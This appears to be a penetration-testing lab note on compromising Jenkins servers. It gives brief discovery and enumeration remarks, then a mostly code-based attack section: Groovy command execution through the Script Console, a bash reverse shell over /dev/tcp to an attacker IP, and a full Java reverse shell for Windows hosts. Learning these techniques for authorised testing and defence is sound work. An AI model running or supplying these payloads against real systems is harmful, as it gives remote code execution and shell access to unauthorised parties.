Jenkins is an open-source automation server written in Java to help developers build and test their software project continuously. Server-based system that runs in servlet containers such as Tomcat.
Discovery
Jenkins run on Tomcat port 8080 by default but also utilizes the port 5000 to attache slave servers. Jenkins can use a local database LDAP, Unix user database, delegate security to a servlet container or use no authentication at all.
Enumeration
By default Jenkins’ database is used to store credentials and does not allow users to register an account.
Attacking
Achieving command execution is relatively easy via the Script Console in Jenkins. It allows us to run arbitrary Groovy scripts within the Jenkins controller runtime often within the context of the root or SYSTEM account.
It can be reached at http://jenkins.inlanefreight.local:8000/script. It is possible to run arbitrary commands
def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println soutWe can also gain a reverse shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()Against a Windows Host we could attempt to add user and connect to the host via RDP or WinRM, etc.
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");We could also use this Java reverse shell for Windows hosts
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();